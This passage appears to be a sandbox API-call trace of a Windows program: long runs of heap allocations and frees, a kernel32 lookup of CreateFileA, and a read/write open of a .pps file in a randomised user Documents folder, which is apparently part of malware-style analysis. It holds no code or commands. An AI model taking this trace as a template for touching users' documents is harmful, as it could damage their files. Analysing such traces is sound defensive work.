0x7af4c8 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.773] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ca30 [0033.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ca30, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0033.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.773] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0033.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca30 [0033.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ca30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0033.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.774] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0033.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0033.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps", cchWideChar=109, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 109 [0033.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6d) returned 0x7db378 [0033.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps", cchWideChar=109, lpMultiByteStr=0x7db378, cbMultiByte=109, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps", lpUsedDefaultChar=0x0) returned 109 [0033.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0033.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.775] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\6v0 igsxnne4wy28.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=109, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xda) returned 0x7c5448 [0033.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=109, lpWideCharStr=0x7c5448, cchWideChar=109 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps") returned 109 [0033.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c50e0 [0033.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0033.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.777] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.778] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 